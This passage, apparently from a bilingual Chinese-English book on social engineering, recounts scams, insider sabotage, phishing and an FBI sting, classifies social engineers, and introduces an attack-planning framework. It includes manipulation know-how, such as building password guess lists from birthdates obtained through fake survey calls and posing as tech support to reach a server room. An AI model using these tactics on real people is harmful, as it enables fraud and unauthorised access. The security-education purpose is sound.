你不会在每次行动中都用到这些技能,你也无法掌握这些技能。相反,通过了解这些技能的工作原理和使用时机,任何人都可以掌握社会工程学。确实,有些人有天赋,比如凯文·米特尼克 (Kevin Mitnick),他似乎可以说服任何人做任何事。弗兰克·阿巴格内尔 (Frank Abagnale, Jr.) 似乎有天赋欺骗人们相信他就是他希望他们相信的那个人。维克多·卢斯蒂格 (Victor Lustig) 做了令人难以置信的事情,他实际上让一些人相信他有权出售埃菲尔铁塔,仅次于他对阿尔·卡彭 (Al Capone) 的诈骗。

You do not use every one of these skills in each engagement, nor can you master every one of these skills. Instead, by understanding how these skills work and when to use them, anyone can master the science of social engineering. It is true that some people have a natural talent, like Kevin Mitnick, who could talk anyone into anything, it seemed. Frank Abagnale, Jr., seemed to have the natural talents to con people into believing he was who he wanted them to believe he was. Victor Lustig did the unbelievable, actually convincing some people that he had the rights to sell the Eiffel Tower, topped only by his scam on Al Capone.

 

这些社会工程师和许多其他与他们类似的人似乎拥有天赋或无所畏惧,这使他们能够尝试我们大多数人从未考虑过尝试的事情。不幸的是,在当今世界,恶意黑客不断提高操纵他人的技能,恶意社会工程攻击也日益增多。DarkReading 发表了一篇文章 ( www.darkreading.com/database_security/security/attacks/showArticle.jhtml?articleID=226200272 ),其中指出,每次数据泄露的损失高达 100 万至 5300 万美元。DarkReading 引用 Ponemon Institute 的研究指出:“Ponemon 发现,基于 Web 的攻击、恶意代码和恶意内部人员是成本最高的攻击类型,占每个组织每年所有网络犯罪成本的 90% 以上:基于 Web 的攻击成本为 143,209 美元;恶意代码成本为 124,083 美元;恶意内部人员成本为 100,300 美元。”恶意内部人员位列前三名表明企业需要更多地意识到恶意社会工程所带来的威胁,即使来自员工。

These social engineers and many more like them seem to have natural talent or a lack of fear that enables them to try things that most of us would never consider attempting. Unfortunately in the world today, malicious hackers are continually improving their skills at manipulating people and malicious social engineering attacks are increasing. DarkReading posted an article (www.darkreading.com/database_security/security/attacks/showArticle.jhtml?articleID=226200272) that cites that data breaches have reached between $1 and $53 million per breach. Citing research by the Ponemon Institute DarkReading states, “Ponemon found that Web-borne attacks, malicious code, and malicious insiders are the most costly types of attacks, making up more than 90 percent of all cybercrime costs per organization per year: A Web-based attack costs $143,209; malicious code, $124,083; and malicious insiders, $100,300.” Malicious insiders being listed on the top three suggests that businesses need to be more aware of the threats posed by malicious social engineering, even from employees.

 

如果人们接受过教育,许多此类袭击本可避免,因为他们可以根据所学采取行动。有时,仅仅发现人们的思维和行为有多么恶意,就可以让人大开眼界。

Many of these attacks could have been avoided if people were educated, because they could act on that education. Sometimes just finding out how malicious people think and act can be an eye opener.

 

举一个更小、更私人的例子,我最近和一位好朋友讨论了她的财务账户,以及她担心遭到黑客攻击或诈骗。在谈话过程中,我们开始讨论“猜出”别人的密码有多么容易。我告诉她,许多人每个账户都使用相同的密码;当她意识到这是她的密码时,我看到她的脸色苍白。我告诉她,大多数人都使用简单的密码,将配偶的名字、生日或周年纪念日等信息组合在一起。我看到她的脸色越来越苍白。我继续说,大多数时候人们会选择最简单的“安全问题”,例如“你(或你母亲)的娘家姓”,而通过互联网或几个假电话就能轻易找到这些信息。

As example on a much smaller and more personal scale, I was recently discussing with a close friend her financial accounts and how she was worried about being hacked or scammed. In the course of the conversation we started to discuss how easy it is to “guess” people’s passwords. I told her that many people use the same passwords for every account; I saw her face go white as she realized this is her. I told her that most people use simplistic passwords that combine things like their spouse’s name, his or her birthday, or anniversary date. I saw her go an ever-brighter shade of pale. I continued by saying that most of the time people chose the simplest “security question” such as “your (or your mother’s) maiden name” and how easy finding that information is via the Internet or a few fake phone calls.

 

许多人会在 Blippy、Twitter 或 Facebook 帐户中列出这些信息。这位朋友很少使用社交媒体网站,所以我问她,她是否认为打几个电话就能交出这些信息。她当然说不。为了说明人们是多么容易交出个人信息,我告诉她,我曾经在一家餐厅看到一张餐垫,上面有一张当地高尔夫球场的 50 美元优惠券——非常诱人的优惠。要利用此优惠,您只需提供您的姓名、出生日期和街道地址,并提供一个帐户密码,该帐户将设置并发送到您的电子邮件地址。(我之所以首先注意到这一点,是因为有人已经开始填写优惠券并将其留在桌子上。)每天都有网站被创建来收集此类敏感信息。

Many people will list this information in Blippy, Twitter, or Facebook accounts. This particular friend didn’t use social media sites too much, so I asked her that if she thought with a few phone calls she could picture herself giving over this information. Of course she said no. To illustrate how easily people hand over personal information, I told her that I once saw a placemat in a restaurant that had a $50-off coupon for a local golf course—a very attractive offer. To take advantage of this offer, you only had to provide your name, date of birth, and street address, and provide a password for an account that would be set up and sent to your e-mail address. (I only noticed this in the first place because someone had started filling out the coupon and left it on the table.) Every day websites are created to collect such sensitive information.

 

通过电话调查或互联网上的快速搜索,我就能知道出生日期或周年纪念日,有了这些信息,我就有足够的能力建立一个密码攻击列表。此外,有十几个网站提供个人各种个人信息的详细记录,价格仅为 9 至 30 美元。

A phone call with a survey or some quick research on the Internet can yield a birth date or anniversary date, and armed with this information I have enough to build a password attack list. Plus, a dozen sites offer detailed records of all sorts of personal information on an individual for a mere $9–$30 USD.

 

了解恶意社会工程师的想法、骗子对信息的反应以及骗子会如何尝试一切手段,可以帮助人们更好地了解周围发生的事情。

Realizing how malicious social engineers think, how scammers react to information, and how con men will try anything, can help people to be more aware of what is going on around them.

 

我和一群安全爱好者在互联网上搜罗了各种故事,这些故事展示了社会工程学的许多不同方面。这些故事可以帮助回答一个至关重要的问题——“社会工程学在社会中是如何运用的?”——并了解社会工程学的定位和它是如何被恶意使用的。

A team of security enthusiasts and I have scoured the Internet collecting stories that show many different aspects of social engineering. These stories can help answer a vital question—“how is social engineering used in society over time?”—and see where social engineering’s place is and how it is used maliciously.

 

社会工程学及其在社会中的地位

Social Engineering and Its Place in Society

 

正如前面所讨论的,社会工程学可用于生活的许多领域,但并非所有这些用途都是恶意或不良的。很多时候,社会工程学可用于激励一个人采取对他们有利的行动。如何做到?

As already discussed social engineering can be used in many areas of life, but not all of these uses are malicious or bad. Many times social engineering can be used to motivate a person to take an action that is good for them. How?

 

想想看:约翰需要减肥。他知道自己不健康,需要为此做点什么。约翰所有的朋友也都超重了。他们甚至拿超重的乐趣开玩笑,说“我喜欢不用担心自己的身材。”一方面,这是社会工程学的一个方面。这是社会认同或共识,你认为或认为可以接受的东西是由你周围的人决定的。因为约翰的亲密朋友认为超重是可以接受的,所以约翰更容易接受。然而,如果其中一个朋友减肥了,没有妄加评判,而是有动力去帮助他,那么约翰对自己体重的心理框架就有可能改变,他可能会开始觉得减肥是可能的,而且是好事。

Think about this: John needs to lose weight. He knows he is unhealthy and needs to do something about it. All of John’s friends are overweight, too. They even make jokes about the joys of being overweight and say things like, “I love not worrying about my figure.” On one hand, this is an aspect of social engineering. It is social proof or consensus, where what you find or deem acceptable is determined by those around you. Because John’s close associations view being overweight as acceptable, it is easier for John to accept it. However, if one of those friends lost weight and did not become judgmental but was motivated to help, the possibility exists that John’s mental frame about his weight might change and he might start to feel that losing weight is possible and good.

 

这本质上就是社会工程学。为了让您清楚地了解社会工程学如何融入社会和日常生活,以下部分介绍了一些社会工程学、骗局和操纵的例子,并回顾了它们的运作方式。

This is, in essence, social engineering. So you can clearly see how social engineering fits into society and everyday life, the following sections present a few examples of social engineering, scams, and manipulation and a review of how they worked.

 

419诈骗

The 419 Scam

 

419 诈骗,也就是众所周知的尼日利亚诈骗,已经发展成为一种流行病。您可以在www.social-engineer.org/wiki/archives/ConMen/ConMen-Scam-NigerianFee.html找到有关此诈骗的存档故事和文章。

The 419 scam, better known as the Nigerian Scam, has grown into an epidemic. You can find an archived story and article about this scam at www.social-engineer.org/wiki/archives/ConMen/ConMen-Scam-NigerianFee.html.

 

基本上,受害者会收到一封电子邮件(或者最近是一封信),告诉他,他已被选中进行一项非常有利可图的交易,他所需要做的就是提供一点帮助。如果受害者愿意帮助发信人从外国银行提取一大笔钱,他可以从中抽取一定比例。在目标信心满满并“签约”后,会出现一个问题,导致目标支付费用。支付费用后,另一个问题又出现了,还有另一笔费用。每个问题都是“最后一个”,并有“最后一笔费用”,这可能会持续数月。受害者永远拿不到任何钱,并在此过程中损失了 10,000 至 50,000 美元。这种骗局之所以如此令人惊奇,是因为过去曾有人报告过官方文件、论文、信笺,甚至面对面的会议。

Basically an email (or as of late, a letter) comes to the target telling him he has been singled out for a very lucrative deal and all he needs to do is offer a little bit of help. If the victim will help the letter sender extract a large sum of money from foreign banks he can have a percentage. After the target is confident and “signs on,” a problem arises that causes the target to pay a fee. After the fee is paid another problem comes up, along with another fee. Each problem is “the last” with “one final fee” and this can be stretched out over many months. The victim never sees any money and loses from $10,000–$50,000 USD in the process. What makes this scam so amazing is that in the past, official documents, papers, letterhead, and even face-to-face meetings have been reported.

 

最近出现了这种骗局的变种,受害者实际上会收到一张真正的支票。骗子承诺给受害者一大笔钱,但只要求他们付出的一小部分。如果受害者将一笔小额款项(相比之下)电汇给骗子,当他们收到承诺的支票时,他们可以将支票存入银行并保留差额。问题是收到的支票是欺诈性的,当受害者去兑现支票时,她会被指控支票欺诈并被处以罚款,在某些情况下,受害者已经将钱汇给了骗子。

Recently a variation of this scam has popped up where victims are literally sent a real check. The scammers promise a huge sum of money and want in return only a small portion for their efforts. If the target will wire transfer a small sum (in comparison) of $10,000, when they receive the promised check they can deposit the check and keep the difference. The problem is that the check that comes is a fraud and when the victim goes to cash it she is slapped with check fraud charges and fines, in some cases after the victim has already wired money to the scammer.

 

这种骗局之所以成功,是因为它利用了受害者的贪婪。谁不愿意花 10,000 美元来赚取 1,000,000 美元甚至 100,000 美元呢?大多数聪明人都会这么做。当这些人拿到官方文件、护照、收据,甚至有“政府人员”的官方办公室时,他们的信念就坚定了,他们会不遗余力地完成交易。承诺和一致性以及义务在这一骗局中发挥着作用。我将在后面的章节中更详细地讨论这些属性,到时候你就会明白为什么这种骗局如此强大。

This scam is successful because it plays on the victim’s greed. Who wouldn’t give $10,000 to make $1,000,000 or even $100,000? Most smart people would. When these people are presented with official documents, passports, receipts, and even official offices with “government personnel” then their belief is set and they will go to great lengths to complete the deal. Commitment and consistency play a part in this scam as well as obligation. I discuss these attributes in greater detail in later chapters, and when I do, you will see why this scam is so powerful.

 

稀缺的力量

The Power of Scarcity

 

存档于www.social-engineer.org/wiki/archives/Governments/Governments-FoodElectionWeapon.html的文章讨论了一种称为稀缺性的原则。

The article archived at www.social-engineer.org/wiki/archives/Governments/Governments-FoodElectionWeapon.html talks about a principle called scarcity.

 

稀缺性是指当人们被告知他们需要或想要的东西供应有限,而要得到它,他们必须遵守某种态度或行动。很多时候,期望的行为甚至没有被说出来,而是通过向那些“正确”行事的人展示获得奖励来传达。

Scarcity is when people are told something they need or want has limited availability and to get it they must comply with a certain attitude or action. Many times the desired behavior is not even spoken, but the way it is conveyed is by showing people who are acting “properly” getting rewards.

 

这篇文章讨论了南非利用食物赢得选举的情况。当一个团体或个人不支持“正确”的领导人时,食物就会变得稀缺,人们曾经拥有的工作就会被给予更支持他们的人。当人们看到这种情况时,很快就会让他们就范。这是一种非常恶意和有害的社会工程形式,但无论如何,这是一种值得借鉴的方式。通常情况下,人们想要稀缺的东西,如果他们被引导相信某些行为会导致他们失去这些东西,他们就会不择手段。某些情况甚至更糟,就像前面的例子一样,政府拿走了生活中必需品,使其变得“稀缺”,只提供给支持者——这是一种恶意但非常有效的操纵策略。

The article talks about the use of food to win elections in South Africa. When a group or person does not support the “right” leader, foodstuffs become scarce and jobs people once had are given to others who are more supportive. When people see this in action, it doesn’t take long to get them in line. This is a very malicious and hurtful form of social engineering, but nonetheless, one to learn from. It is often the case that people want what is scarce and they will do anything if they are lead to believe that certain actions will cause them to lose out on those items. What makes certain cases even worse, as in the earlier example, is that a government took something necessary to life and made it “scarce” and available only to supporters—a malicious, but very effective, manipulation tactic.

 

达赖喇嘛与社会工程

The Dalai Lama and Social Engineering

 

www.social-engineer.org/wiki/archives/Spies/Spies-DalaiLama.html上存档的有趣文章详细记录了 2009 年对达赖喇嘛的袭击。

The interesting article archived at www.social-engineer.org/wiki/archives/Spies/Spies-DalaiLama.html details an attack made on the Dalai Lama in 2009.

 

一个中国黑客组织想要入侵达赖喇嘛的网络服务器和文件。这次成功的攻击使用了什么手段?

A Chinese hacker group wanted to access the servers and files on the network owned by the Dalai Lama. What methods were used in this successful attack?

 

攻击者说服达赖喇嘛办公室的工作人员下载并打开其服务器上的恶意软件。这次攻击很有趣,因为它结合了技术黑客和社会工程学。

The attackers convinced the office staff at the Dalai Lama’s office to download and open malicious software on their servers. This attack is interesting because it blends both technology hacking and social engineering.

 

文章称,“据《华盛顿时报》周一援引剑桥大学计算机实验室安全工程教授罗斯·​​安德森的说法,该软件被附加在声称来自西藏运动同事或联系人的电子邮件中。该软件窃取了密码和其他信息,从而使黑客能够访问办公室的电子邮件系统和存储在计算机上的文件。”

The article states, “The software was attached to e-mails that purported to come from colleagues or contacts in the Tibetan movement, according to researcher Ross Anderson, professor of security engineering at the University of Cambridge Computer Laboratory, cited by the Washington Times Monday. The software stole passwords and other information, which in turn gave the hackers access to the office’s e-mail system and documents stored on computers there.”

 

攻击者不仅使用了操控手段,还使用了常见的攻击媒介,例如网络钓鱼(发送带有诱人消息和链接或文件的电子邮件,必须打开这些链接或文件才能接收更多信息;这些链接或文件通常会导致恶意负载)和漏洞利用。这种攻击可以奏效,并且已经对大型企业和政府造成了影响。这个例子只是这些媒介造成巨大破坏的众多例子中的一个。

Manipulation was used as well as common attack vectors such as phishing (the practice of sending out emails with enticing messages and links or files that must be opened to receive more information; often those links or files lead to malicious payloads) and exploitation. This attack can work and has worked against major corporations as well as governments. This example is just one in a large pool of examples where these vectors cause massive damage.

 

员工盗窃

Employee Theft

 

关于员工盗窃的话题可以写成几本书,特别是考虑到www.social-engineer.org/wiki/archives/DisgruntledEmployees/DisgruntledEmployees-EmployeeTheft.html上公布的惊人统计数据:超过 60% 接受采访的员工承认从其雇主那里窃取了某种数据。

The topic of employee theft could fill volumes, especially in light of the staggering statistic found at www.social-engineer.org/wiki/archives/DisgruntledEmployees/DisgruntledEmployees-EmployeeTheft.html that more than 60 percent of employees interviewed admitted to taking data of one sort or another from their employers.

 

很多时候,这些数据会被出售给竞争对手(正如摩根士丹利员工的故事中发生的那样:www.social-engineer.org/wiki/archives/DisgruntledEmployees/DisgruntledEmployees-MorganStanley.html)。其他时候,员工盗窃的是时间或其他资源;在某些情况下,心怀不满的员工可能会造成重大损失。

Many times this data is sold to competitors (as happened in this story from a Morgan Stanley employee: www.social-engineer.org/wiki/archives/DisgruntledEmployees/DisgruntledEmployees-MorganStanley.html). Other times employee theft is in time or other resources; in some cases a disgruntled employee can cause major damage.

 

我曾与一位客户讨论过员工离职政策,比如禁用钥匙卡、断开网络帐户以及护送离职员工离开大楼等。该公司认为每个人都是“家庭”的一部分,这些政策不适用。

I once talked to a client about employee discharge policies, things like disabling key cards, disconnecting network accounts, and escorting discharged employees out of the building. The company felt that everyone was part of the “family” and that those policies wouldn’t apply.

 

不幸的是,公司高层之一“吉姆”被解雇的时候到了。“解雇”进行得很顺利;双方友好相处,吉姆表示理解。公司唯一做对的事情就是在下班时间左右进行解雇,以避免尴尬和分心。两人握手后,吉姆问了一个决定性的问题:“我能花一个小时清理一下我的办公桌,从电脑上删掉一些个人照片吗?我会在离开前将钥匙卡交给保安。”

Unfortunately, the time came to let go of “Jim,” one of the higher-ranking people in the company. The “firing” went well; it was amicable and Jim said he understood. The one thing the company did right was to handle the firing around closing time to avoid embarrassment and distraction. Hands were shook and then Jim asked the fateful question, “Can I take an hour to clean out my desk and take some personal pictures off my computer? I will turn my key card into the security guard before I leave.”

 

会议结束后,大家兴致勃勃,很快就同意了,笑着离开了。然后,吉姆回到办公室,收拾好所有个人物品,从电脑中取出照片和其他数据,连接网络,清除了 11 台服务器的数据 — 会计记录、工资单、发票、订单、历史记录、图形等,这些数据在几分钟内全部被删除。吉姆按照承诺交出了钥匙卡,然后平静地离开了大楼,没有证据证明他是发起这些攻击的人。

Feeling good about the meeting, they all quickly agreed and left with smiles and a few laughs. Then Jim went to his office, packed a box of all his personal items, took the pictures and other data off his computer, connected to the network, and wiped clean 11 servers’ worth of data—accounting records, payroll, invoices, orders, history, graphics, and much more just deleted in a matter of minutes. Jim turned in his key card as he promised and calmly left the building with no proof that he was the one to initiate these attacks.

 

第二天早上,老板打电话给我,描述了这位前员工去世后所发生的惨剧。客户希望找到灵丹妙药,因此别无选择,只能尝试恢复可以通过法医手段恢复的数据,并从两个多月前的备份开始。

The next morning a call came in to me from the owner describing the carnage in the ex-employee’s wake. Hoping for a silver bullet, the client had no choice but try to recover what could be recovered forensically and start over from the backups, which were more than two months old.

 

心怀不满的员工如果不加以管控,其破坏力可能比一群意志坚定、技术娴熟的黑客还要大。据估计,仅在美国,因员工盗窃而造成的企业损失就高达 150 亿美元。

A disgruntled employee who is left unchecked can be more devastating than a team of determined and skilled hackers. To the tune of $15 billion USD, that is what the loss is estimated at being to businesses in the U.S. alone due to employee theft.

 

这些故事可能会留下一个问题:社会工程师有哪些不同的类别,以及是否可以对他们进行分类。

These stories may leave a question about what different categories of social engineers are out there and whether they can be classified.

 

DarkMarket 和 Master Splynter

DarkMarket and Master Splynter

 

2009 年爆出了一个关于地下组织 DarkMarket 的消息,该组织被称为“罪犯的 eBay”,是一个非常严密的组织,专门交易被盗的信用卡号和身份盗窃工具,以及制作伪造凭证所需的物品等。

In 2009 a story broke about an underground group called DarkMarket—the so-called eBay for criminals, a very tight group that traded stolen credit card numbers and identity theft tools, as well as the items needed to make fake credentials and more.

 

一位名叫 J. Keith Mularski 的 FBI 特工潜入 DarkMarket 网站,潜入后不久,Mularski 特工就被任命为该网站的管理员。尽管许多人试图诋毁他,但他还是坚持担任该网站管理员三年多。

An FBI agent by the name of J. Keith Mularski went under deep cover and infiltrated the DarkMarket site. After a while, Agent Mularski was made an administrator of the site. Despite many trying to discredit him he hung in for more than three years as the admin of the site.

 

在此期间,穆拉斯基不得不像一个恶意黑客一样生活、说话、行动、思考。他伪装成一个恶意垃圾邮件发送者,而且他有足够的知识来做到这一点。他的伪装和社会工程技能得到了回报,因为特工穆拉斯基以臭名昭著的 Splynter 大师的身份潜入了 DarkMarket,并在三年后成为关闭一个大规模身份盗窃团伙的关键人物。

During this time, Mularski had to live as a malicious hacker, speak and act as one, and think as one. His pretext was one of a malicious spammer and he was knowledgeable enough to pull it off. His pretext and his social engineering skills paid off because Agent Mularski infiltrated DarkMarket as the infamous Master Splynter, and after three years was essential in shutting down a massive identity theft ring.

 

为期三年的社会工程诱捕行动逮捕了 59 人,并阻止了超过 7000 万美元的银行欺诈。这只是社会工程技能如何造福社会的一个例子。

The three-year social engineering sting operation netted 59 arrests and prevented over $70 million in bank fraud. This is just one example of how social engineering skills can be used for good.

 

不同类型的社会工程师

The Different Types of Social Engineers

 

如前所述,社会工程学有多种形式。它可以是恶意的,也可以是友好的,它可以建立,也可以破坏。在进入本书的核心部分之前,先简单了解一下社会工程学的不同形式,并对每种形式做一个非常简短的描述:

As previously discussed, social engineering can take on many forms. It can be malicious and it can be friendly, it can build up and it can tear down. Before moving on to the core of this book, take a brief look at the different forms of social engineers and a very short description of each:

 
 
     
  • 黑客:软件供应商在开发更坚固或更难破解的软件方面越来越熟练。随着黑客攻击的软件越来越坚固,软件和网络攻击媒介(如远程黑客)也变得越来越困难,黑客开始转向社交工程技能。黑客通常结合使用硬件和个人技能,在世界各地的重大攻击和小规模入侵中都使用社交工程。
  • Hackers: Software vendors are becoming more skilled at creating software that is hardened, or more difficult to break into. As hackers are hitting more hardened software and as software and network attack vectors, such as remote hacking, are becoming more difficult, hackers are turning to social engineering skills. Often using a blend of hardware and personal skills, hackers are using social engineering in major attacks as well as in minor breaches throughout the world.
  •  
     
  • 渗透测试员:由于现实世界中的渗透测试员(也称为渗透测试员)本质上非常具有攻击性,因此这一类别必须紧随黑客之后。真正的渗透测试员会学习并使用恶意黑客使用的技能,以真正帮助确保客户的安全。渗透测试员可能拥有恶意黑帽黑客的技能,但绝不会利用这些信息谋取私利或伤害目标。
  • Penetration testers: Since a real-world penetration tester (also known as a pentester) is very offensive in nature, this category must follow after hackers. True penetration testers learn and use the skills that the malicious hackers use to truly help ensure a client’s security. Penetration testers are people who might have the skills of a malicious black hat but who never use the information for personal gain or harm to the target.
  •  
     
  • 间谍:间谍将社会工程学作为一种生活方式。间谍通常采用社会工程学框架的各个方面(本章后面将讨论),他们是这门科学的专家。来自世界各地的间谍被教导使用不同的方法来“欺骗”受害者,让他们相信他们是别人或事物,其实不是。除了学习社会工程学的艺术外,间谍很多时​​候还会通过了解他们试图进行社会工程学的企业或政府的一点点甚至很多信息来建立可信度。
  • Spies: Spies use social engineering as a way of life. Often employing every aspect of the social engineering framework (discussed later in this chapter), spies are experts in this science. Spies from all around the world are taught different methods of “fooling” victims into believing they are someone or something they are not. In addition to being taught the art of social engineering, many times spies also build on credibility by knowing a little or even a lot about the business or government they are trying to social engineer.
  •  
     
  • 身份窃贼:身份窃贼是指在不知情的情况下盗用他人姓名、银行账户、住址、出生日期和社会保险号等信息。这种犯罪行为的范围很广,从穿制服到冒充他人,甚至更复杂的骗局。身份窃贼会运用社会工程学的许多方面,随着时间的推移,他们似乎变得更加大胆,对自己造成的痛苦漠不关心。
  • Identity thieves: Identity theft is the use of information such as a person’s name, bank account numbers, address, birth date, and social security number without the owner’s knowledge. This crime can range from putting on a uniform to impersonating someone to much more elaborate scams. Identity thieves employ many aspects of social engineering and as time passes they seem more emboldened and indifferent to the suffering they cause.
  •  
     
  • 心怀不满的员工:员工心怀不满后,往往会与雇主产生对抗关系。这往往是单方面的,因为员工通常会试图隐藏自己的不满程度,以免危及自己的工作。然而,他们越是心怀不满,就越容易为偷窃、破坏或其他犯罪行为寻找借口。
  • Disgruntled employees: After an employee has become disgruntled, they often enter into an adversarial relationship with their employer. This can often be a one-sided situation, because the employee will typically try to hide their level of displeasure to not put their employment at risk. Yet the more disgruntled they become, the easier it becomes to justify acts of theft, vandalism, or other crimes.
  •  
     
  • 诈骗高手:诈骗或骗局利用贪婪或其他原则来吸引人们的信念和“赚钱”的欲望。诈骗高手或骗子精通读人的能力,并能找出让一个人成为好“目标”的小线索。他们还善于创造对目标来说不可战胜的机会。
  • Scam artist: Scams or cons appeal to greed or other principles that attract people’s beliefs and desires to “make a buck.” Scam artists or con men master the ability to read people and pick out little cues that make a person a good “mark.” They also are skillful at creating situations that present as unbeatable opportunities to a mark.
  •  
     
  • 高级招聘人员:招聘人员还必须掌握社会工程学的许多方面。掌握诱导法以及社会工程学的许多心理学原理后,他们不仅能够非常善于读懂人心,还能理解人们的动机。很多时候,招聘人员不仅要考虑和取悦求职者,还要考虑和取悦发布者。
  • Executive recruiters: Recruiters also must master many aspects of social engineering. Having to master elicitation as well as many of the psychological principles of social engineering, they become very adept at not only reading people but also understanding what motivates people. Many times a recruiter must take into consideration and please not only the job seeker but also the job poster.
  •  
     
  • 销售人员:与招聘人员类似,销售人员必须掌握许多人际交往技巧。许多销售大师说,优秀的销售人员不会操纵人,而是利用他们的技能找出人们的需求,然后看看他们是否能满足这些需求。销售艺术需要许多技能,例如信息收集、诱导、影响、心理原则以及许多其他人际交往技巧。
  • Salespeople: Similar to recruiters, salespeople must master many people skills. Many sales gurus say that a good salesperson does not manipulate people but uses their skills to find out what people’s needs are and then sees whether they can fill it. The art of sales takes many skills such as information gathering, elicitation, influence, psychological principles, as well as many other people skills.
  •  
     
  • 政府:政府通常不被视为社会工程师,而是利用社会工程来控制他们发布的信息以及他们所统治的人民。许多政府利用社会认同、权威和稀缺性来确保其臣民处于控制之中。这种类型的社会工程并不总是负面的,因为政府传递的一些信息是为了人民的利益,使用某些社会工程元素可以使信息更具吸引力并被更广泛地接受。
  • Governments: Not often looked at as social engineers, governments utilize social engineering to control the messages they release as well as the people they govern. Many governments utilize social proof, authority, and scarcity to make sure their subjects are in control. This type of social engineering is not always negative, because some of the messages governments relay are for the good of the people and using certain elements of social engineering can make the message more appealing and more widely accepted.
  •  
     
  • 医生、心理学家和律师:尽管从事这些职业的人似乎与其他许多社会工程人员不属于同一类别,但这一群体采用的方法与此列表中的其他群体相同。他们必须使用诱导和适当的采访和审讯策略,以及许多(如果不是全部)社会工程学的心理学原理来操纵他们的“目标”(客户)走向他们希望他们采取的方向。
  • Doctors, psychologists, and lawyers: Although the people in these careers might not seem like they fit into the same category as many of these other social engineers, this group employs the same methods used by the other groups in this list. They must use elicitation and proper interview and interrogation tactics as well as many if not all of the psychological principles of social engineering to manipulate their “targets” (clients) into the direction they want them to take.
  •  
 

无论在哪个领域,似乎都能找到社会工程学或其某个方面。这就是为什么我坚信社会工程学是一门科学。存在一些方程式,使人们能够“加总”社会工程学的元素以达到目标。以骗子为例,可以这样想:借口 + 操纵 + 贪婪 = 目标被社会工程学化。

Regardless of the field, it seems that you can find social engineering or an aspect of it. This is why I hold firmly to the belief that social engineering is a science. Set equations exist that enable a person to “add up” elements of social engineering to lead to the goal. In the example of a con man, think of the equation like this: pretext + manipulation + attachment to greed = target being social engineered.

 

在任何情况下,了解哪些元素会起作用都是困难的部分,但学习如何利用这些元素才是技能所在。这是开发社会工程学框架背后的思想基础。正如下一节所讨论的,该框架彻底改变了社会工程学的剖析方式。

In every situation, knowing what elements will work is the hard part, but then learning how to utilize those elements is where the skill comes in. This was the basis for thought behind developing the social engineering framework. This framework has revolutionized the way social engineering is dissected, as discussed in the next section.

 

社会工程学框架及其使用方法

The Social Engineering Framework and How to Use It

 

通过经验和研究,我试图概述社会工程师的构成要素。这些要素中的每一个都定义了构成整个社会工程师的等式的一部分。这些方面并不是一成不变的;事实上,从最初的状态到现在,框架已经发展壮大。

Through experience and research I have tried to outline the elements that make up a social engineer. Each of these elements defines a part of the equation that equals a whole social engineer. These aspects are not set in stone; as a matter of fact, from its original state until now the framework has grown.

 

该框架的目的是为任何人提供足够的信息来掌握这些技能。该框架并非旨在成为每章所有信息的包罗万象的资源。例如,第 5 章中涉及微表情的部分是基于该领域一些最伟大的头脑的研究和我使用这些信息的经验。它绝不是要取代保罗·埃克曼博士等伟大头脑 50 年的研究。

The purpose of the framework is to give enough information for anyone to build on these skills. The framework is not designed to be an all-inclusive resource for all information in each chapter. For example, the portion of Chapter 5 that covers microexpressions is based on the research of some of the greatest minds in this field and my experience in using that information. By no means is it meant to replace the 50 years of research by such great minds as Dr. Paul Ekman.

 

当您阅读该框架时,您会发现,通过利用其中的许多技能,您不仅可以增强您的安全实践,还可以增强您对如何保持安全、如何更充分地沟通以及如何理解人们的想法的思维方式。

As you read through the framework you will see that by utilizing the many skills within it, you can not only enhance your security practice, but also your mindset about how to remain secure, how to communicate more fully, and how to understand how people think.

 

请参阅目录以清晰了解该框架,或在线查看www.social-engineer.org/framework。乍一看,该框架可能令人望而生畏,但在本书中,您将找到对每个主题的分析,这些分析将使您能够应用、增强和构建这些技能。

Refer to the table of contents for a clear picture of the framework or view it online at www.social-engineer.org/framework. At first glance the framework may appear daunting, but inside this book you will find an analysis of each topic that will enable you to apply, enhance, and build these skills.

 

知识就是力量——这是真的。从这个意义上说,教育是抵御大多数社会工程攻击的最佳防御手段。即使是知识无法 100% 防范的攻击,了解这些攻击的细节也能让你保持警惕。教育可以帮助你提高自己的技能,并保持警惕。

Knowledge is power—it is true. In this sense, education is the best defense against most social engineering attacks. Even the ones that knowledge can’t protect 100 percent against, having details of these attacks keeps you alert. Education can help you enhance your own skills, as well as be alert.

 

不过,除了学习,你还需要练习。本书并非设计为一本一次性阅读的手册;相反,它旨在成为一本学习指南。你可以根据需要练习和自定义每个部分。该框架是渐进式的,因为它是社会工程攻击的布局方式。框架的每个部分都按照社会工程师在其参与或规划阶段可能使用该技能的顺序讨论下一个主题。

Along with education, though, you need practice. This book was not designed to be a once-read manual; instead it was designed to be a study guide. You can practice and customize each section for your needs. The framework is progressive in the sense that it is the way a social engineering attack is laid out. Each section of the framework discusses the next topic in the order that a social engineer might utilize that skill in their engagement or planning phases.

 

该框架展示了如何规划攻击。在计划好攻击后,可以在实施前学习、增强和练习所需的技能。

The framework shows how an attack might be outlined. After the attack is planned out, the skills that are needed can be studied, enhanced, and practiced before delivery.

 

例如,假设您正计划对一家公司进行社会工程审计,该公司想查看您是否可以进入其服务器机房并窃取数据。

Suppose, for example, that you are planning a social engineering audit against a company that wanted to see whether you could gain access to its server room and steal data.

 

也许你的攻击计划是假装成需要访问服务器机房的技术支持人员。你可能想要收集信息,甚至可能翻遍垃圾桶。

Maybe your plan of attack would be to pretend to be a tech support person who needs access to the server room. You would want to gather information, maybe even perform a dumpster dive.

 

然后,以技术人员为借口,你可以使用一些隐蔽的摄像工具,并练习正确的语言和面部/声音提示,以了解如何表现、听起来和看起来像一个技术人员。

Then under the pretext of being the tech guy, you could utilize some covert camera tools as well as practice the proper language and facial/vocal cues for how to act, sound, and look like a tech guy.

 

如果您找到客户使用哪家公司提供技术支持,您可能需要收集相关信息。您的客户通常找谁来为他们提供服务?与他们互动的员工姓名是什么?攻击需要妥善规划。

If you locate what company your client uses for tech support you may need to do info gathering on it. Who does your client normally get to service them? What are the names of the employees with whom they interact? The attack needs to be planned out properly.

 

不过,这本书不只是为那些执行审计的人而写的。许多读者对这些攻击感到好奇,不是因为他们在保护公司,而是因为他们需要保护自己。不了解恶意社交工程师的思维方式可能会导致某人走上被黑客攻击的道路。

This book is not just for those who perform audits, though. Many readers are curious about what the attacks are, not because they are protecting a company, but because they need to protect themselves. Not being aware of the way a malicious social engineer thinks can lead someone down the path toward being hacked.

 

安全领域的大学生也使用过该框架。框架中的信息概述了这些载体或攻击方法的现实路径,使读者能够深入研究它们。

